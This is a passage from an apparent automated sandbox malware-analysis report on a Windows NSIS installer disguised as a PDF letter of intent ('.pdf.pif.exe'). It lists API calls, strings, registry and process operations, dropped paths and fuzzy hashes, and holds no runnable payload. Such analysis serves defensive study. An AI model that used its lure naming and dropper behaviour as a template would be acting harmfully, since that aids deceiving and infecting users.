                                                                                        • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                        • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00402D78
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"$0M$4O$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 4283519449-2733377426
                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                        • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                        • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C38
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C84
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C8E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001CA8
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D93
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D98
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D9D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F41
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 100020A7
                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 1000211B
                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 1000212C
                                                                                      • lstrlenW.KERNEL32(00000808), ref: 10002160
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc$HandleLibraryLoadModulelstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 226667998-0

                                                                                      Control-flow Graph (function at 00401752; blocks marked Executed / Not Executed)
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise,?,?,00000031), ref: 00401793
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise,?,?,00000031), ref: 004017B8
                                                                                        • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                        • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,0040309B,0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0), ref: 00405055
                                                                                        • Part of subcall function 00404FFA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll), ref: 00405067
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp$C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise$Call

                                                                                      Control-flow Graph
                                                                                      • [Graph omitted: first basic block 404ffa-40500f; nodes are marked Executed or Not Executed]
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                      • lstrlenW.KERNEL32(0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,0040309B,0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0), ref: 00405055
                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll), ref: 00405067
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll

                                                                                      Control-flow Graph
                                                                                      • [Graph omitted: first basic block 402f38-402f51; nodes are marked Executed or Not Executed]
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402FA3
                                                                                      • GetTickCount.KERNEL32 ref: 00403048
                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403071
                                                                                      • wsprintfW.USER32 ref: 00403084
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,0041D5A8,00402ED2,00000000), ref: 004030B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CountTick$FileWritewsprintf
                                                                                      • String ID: ... %d%%

                                                                                      Control-flow Graph
                                                                                      • [Graph omitted: first basic block 402571-402580; nodes are marked Executed or Not Executed]
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,00000001,?), ref: 004025CA
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,00000001,?,00000001), ref: 004025EC
                                                                                      • ReadFile.KERNEL32(?,?,00000002,?), ref: 00402607
                                                                                        • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FileRead$ByteCharMultiWidewsprintf
                                                                                      • String ID: 9

                                                                                      Control-flow Graph
                                                                                      • [Graph omitted: first basic block 40232f-402375; nodes are marked Executed or Not Executed]
                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp

                                                                                      Control-flow Graph
                                                                                      • [Graph omitted: first basic block 4015b9-4015cd; nodes are marked Executed or Not Executed]
                                                                                      APIs
                                                                                        • Part of subcall function 00405859: CharNextW.USER32(?,?,0042FA00,?,004058CD,0042FA00,0042FA00,?,?,74DF3420,004055F5,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"), ref: 00405867
                                                                                        • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 0040586C
                                                                                        • Part of subcall function 00405859: CharNextW.USER32(00000000), ref: 00405884
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise,?,00000000,000000F0), ref: 00401630
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise, xrefs: 00401623
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright\Unsecludedly\Unpulverise

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 956 402b10-402b39 RegOpenKeyExW 957 402ba4-402ba8 956->957 958 402b3b-402b46 956->958 959 402b61-402b71 RegEnumKeyW 958->959 960 402b73-402b85 RegCloseKey call 4060b0 959->960 961 402b48-402b4b 959->961 969 402b87-402b96 960->969 970 402bab-402bb1 960->970 962 402b98-402b9b RegCloseKey 961->962 963 402b4d-402b5f call 402b10 961->963 965 402ba1-402ba3 962->965 963->959 963->960 965->957 969->957 970->965 971 402bb3-402bc1 RegDeleteKeyW 970->971 971->965 972 402bc3 971->972 972->957
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B31
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402B6D
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B76
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B9B
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402BB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                      • String ID:

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 974 1000177a-100017b6 call 10001b47 978 100018c7-100018c9 974->978 979 100017bc-100017c0 974->979 980 100017c2-100017c8 call 10002244 979->980 981 100017c9-100017d6 call 1000228e 979->981 980->981 986 10001806-1000180d 981->986 987 100017d8-100017dd 981->987 988 1000182d-10001831 986->988 989 1000180f-1000182b call 10002430 call 100015d5 call 10001280 GlobalFree 986->989 990 100017f8-100017fb 987->990 991 100017df-100017e0 987->991 996 10001833-1000186d call 100015d5 call 10002430 988->996 997 1000186f-10001875 call 10002430 988->997 1013 10001876-1000187a 989->1013 990->986 992 100017fd-100017fe call 10002acf 990->992 994 100017e2-100017e3 991->994 995 100017e8-100017e9 call 10002814 991->995 1005 10001803 992->1005 1001 100017f0-100017f6 call 100025b7 994->1001 1002 100017e5-100017e6 994->1002 1008 100017ee 995->1008 996->1013 997->1013 1012 10001805 1001->1012 1002->986 1002->995 1005->1012 1008->1005 1012->986 1017 100018b7-100018be 1013->1017 1018 1000187c-1000188a call 100023f3 1013->1018 1017->978 1020 100018c0-100018c1 GlobalFree 1017->1020 1024 100018a2-100018a9 1018->1024 1025 1000188c-1000188f 1018->1025 1020->978 1024->1017 1027 100018ab-100018b6 call 10001555 1024->1027 1025->1024 1026 10001891-10001899 1025->1026 1026->1024 1028 1000189b-1000189c FreeLibrary 1026->1028 1027->1017 1028->1024
                                                                                      APIs
                                                                                        • Part of subcall function 10001B47: GlobalFree.KERNEL32(?), ref: 10001D93
                                                                                        • Part of subcall function 10001B47: GlobalFree.KERNEL32(?), ref: 10001D98
                                                                                        • Part of subcall function 10001B47: GlobalFree.KERNEL32(?), ref: 10001D9D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001825
                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000189C
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018C1
                                                                                        • Part of subcall function 10002244: GlobalAlloc.KERNEL32(00000040,206AC300), ref: 10002276
                                                                                        • Part of subcall function 100025B7: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017F6,00000000), ref: 10002629
                                                                                        • Part of subcall function 100015D5: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001752,00000000), ref: 100015EE
                                                                                        • Part of subcall function 10002430: wsprintfW.USER32 ref: 10002484
                                                                                        • Part of subcall function 10002430: GlobalFree.KERNEL32(?), ref: 10002505
                                                                                        • Part of subcall function 10002430: GlobalFree.KERNEL32(00000000), ref: 1000252E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                      • String ID:
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                        • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,0040309B,0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0), ref: 00405055
                                                                                        • Part of subcall function 00404FFA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll), ref: 00405067
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID: OC
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C3D
                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C5E
                                                                                      • RegCloseKey.ADVAPI32(?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C81
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Call
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405A1C
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031DB,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A37
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      APIs
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                        • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,0040309B,0040309B,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,00000000,0041D5A8,74DF23A0), ref: 00405055
                                                                                        • Part of subcall function 00404FFA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll), ref: 00405067
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                        • Part of subcall function 004054C8: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                                                        • Part of subcall function 004054C8: CloseHandle.KERNEL32(?), ref: 004054FA
                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                      • String ID:
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                                                      • CloseHandle.KERNEL32(?), ref: 004054FA
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 004054DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                                      • Instruction ID: f0c92ffbe574dd0cc69d2483c13c623377a7ee9a819dd8a25a80ea7c4393050c
                                                                                      • Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                                      • Instruction Fuzzy Hash: 19E0ECB4500309ABEB009F64ED49E6B7BBDEB04304F018975A950F2150D774D9148B68
                                                                                      APIs
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                        • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                      • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004031CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 4115351271-517883005
                                                                                      • Opcode ID: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                                                      • Instruction ID: 8de04b408351475945b63aae0c0c4e12a59e1662d208add100ced368eac5ea97
                                                                                      • Opcode Fuzzy Hash: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                                                      • Instruction Fuzzy Hash: ACD09222156936B1D551322A3E06BCF190D8F467AEB22807BF844B90964A6C0AC219FE
                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00685288), ref: 00401B92
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
